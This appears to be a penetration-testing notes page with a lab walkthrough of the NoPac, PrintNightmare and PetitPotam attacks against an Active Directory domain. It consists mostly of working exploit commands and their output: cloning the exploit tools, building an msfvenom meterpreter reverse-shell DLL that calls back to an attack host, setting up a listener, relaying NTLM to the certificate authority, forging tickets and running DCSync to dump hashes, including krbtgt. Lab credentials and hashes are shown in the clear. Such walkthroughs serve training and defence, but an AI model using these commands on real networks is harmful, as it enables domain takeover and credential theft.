πŸ”ͺBleeding Edge Vulnerabilities

NoPac (SamAccountName Spoofing)

Nopac or the Same_TheAdmin vulnerability is an emerging threat released at the end of 2021. The attack is made up of two CVEs: 2021-42278 and 2021-42287

These may allow the attacker intra-domain privilege escalation from any standard user to Domain Admin level access.

The flow of the attack can be seen here

NoPac uses a tool in Impacket to communicate with. upload a payload and issue a command from the attack host to the target DC.

Installation

git clone https://github.com/Ridter/noPac.git

Scanning for NoPac

We can use NoPac to check if the system is vulnerable, we use a standard domain user to attempt to gain a TGT from the target DC. If we see ms-DS-MachineAccountQuota = 10 we know it is vulnerable but if ms-DS-MachineAccountQuota = 0 the attack will fail because our user does not have the rights to add a new machine account.

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.5.5. Ticket size 1484
[*] Got TGT from ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. Ticket size 663

Getting a Shell

Once we know the system is vulnerable, we can attempt to get a shell with SYSTEM-level privileges.

We should not that this could be considered "noisy" and may be blocked by AV programs

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

DCSync the Built-in Admin Account

If successful we will now have a .local.cache file on our host.

We can use the file to perform a pass-the-ticket and perform a DCSync attack

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

PrintNightmare

PrintNightmare is a vulnerability found in the Print Spooler service that runs on all Windows OSs. Many exploits have been created based on this to allow privilege escalation and remote code execution.

Install Exploit

git clone https://github.com/cube0x0/CVE-2021-1675.git

Install cube0x0's Version of Impacket

We must make sure that we are using the correct version of Impacket,

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Enumerating for MS-RPRN

We can use the below command to see if Print System Asynchronous Protocol and Print System Remote Protocol are exposed on the target. Once confirmed we can move onto the next step.

 rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

Generating a DLL Payload

We craft a DLL payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

Generate a Share with smbserver.py

We will host the payload in an SMB share

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

Setting us MSF multi/handler

Once the share is created and hosting our payload we can set up a listener to catch the reverse shell

[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST 172.16.5.225
LHOST => 10.3.88.114
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LPORT 8080
LPORT => 8080
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 172.16.5.225:8080 

Running the Exploit

We make sure to have \\<ip address of attack host>\ShareName\nameofpayload.dll in our command then we can finally run the exploit, if it is successful we will receive an elevated SYSTEM shell.

 sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

PetitPotam (MS-EFSRPC)

PetitPotam is an LSA spoofing vulnerability that was patched in 2021. The exploit allows an unauthenticated attacker to coerce a DC to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC).

This allows an attacker to take over a Windows domain where Active Directory Certificate Server (AD CS) is in use.

In the attack, an auth request from the target DC is relayed to the CA host's Web Enrollment page and makes a Certificate Signing Request (CSR) for a new certificate. This certificate can be used with a tool such as Rubues or gettgtpkinit.py to request a TGT for the DC.

To find the location of the CA we can use a tool like https://github.com/zer1t0/certi.

Starting ntlmrelayx.py

We first start ntlmrelayx.py specifying the enrollment URL for the CA host.

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

[*] Setting up WCF Server

[*] Servers started, waiting for connections

Running PetitPotam

In another window, we can start PeitiPotam and pass in the attack host IP and DC IP.

python3 PetitPotam.py 172.16.5.225 172.16.5.5

Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.5.5[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!

[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Catching Base64 Encoded Certificate for DC01

If the login was successful we can try and obtain a base64 cert for the DC

sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

Requesting a TGT

We can use the base64 cert with gettgtpkinit.py to request a TGT for the DC

 python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache

Setting the KRB5CCNAME Env Variable

The TGT was saved as dc01.cache file which we can pass into the KRB5CCNAME env variable so our attack host used this file for Kerberos authentication attempts.

export KRB5CCNAME=dc01.ccache

Using Domain Controller TGT to DCSync

We can use this TGT with secretsdump.py to perform a DCSync and retrieve one or all NTLM hashes for the domain

secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

Confirming Admin Access to the DC

crackmapexec smb 172.16.5.5 -u administrator -H 88ad09182de639ccc6579eb0849751cf

Submitting a TGS Request for Ourselves using getnthash.py

We can use the tool getnthash.py to request the NT hash for our target using Kerberos U2U to submit a TGS request with the Privileged Attribute Certificate (PAC).

python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

Using DC NTLM Hash to DCSync

We can use the obtained hash to perform a DCSync

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba

Requesting TGT with Rubeus

We could alternatively use the certificate we got earlier with Ruebus on the Windows attack host to request a TGT ticket and perform a PTT attack

.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC...SNIP...IkHS2vJ51Ry4= /ptt

[+] Ticket successfully imported!

  ServiceName              :  krbtgt/INLANEFREIGHT.LOCAL
  ServiceRealm             :  INLANEFREIGHT.LOCAL
  UserName                 :  ACADEMY-EA-DC01$
  UserRealm                :  INLANEFREIGHT.LOCAL
  StartTime                :  3/30/2022 3:50:25 PM
  EndTime                  :  3/31/2022 1:50:25 AM
  RenewTill                :  4/6/2022 3:50:25 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  d/AohN1w1ZZXsks8cCUlbg==
  ASREP (key)              :  2A621F62C32241F38FA68826E95521DD

Confirming the Ticket is in Memory

We can check to see if the ticket is in memory

klist

Performing DCSysnc with Mimikatz

Finally, we can perform the attack with the PTT.

PS C:\Tools> cd .\mimikatz\x64\
PS C:\Tools\mimikatz\x64> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'inlanefreight\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 10/27/2021 8:14:34 AM
Object Security ID   : S-1-5-21-3842939050-3880317879-2865463114-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 16e26ba33e455a8c338142af8d89ffbc
    ntlm- 0: 16e26ba33e455a8c338142af8d89ffbc
    lm  - 0: 4562458c201a97fa19365ce901513c21

Last updated

Was this helpful?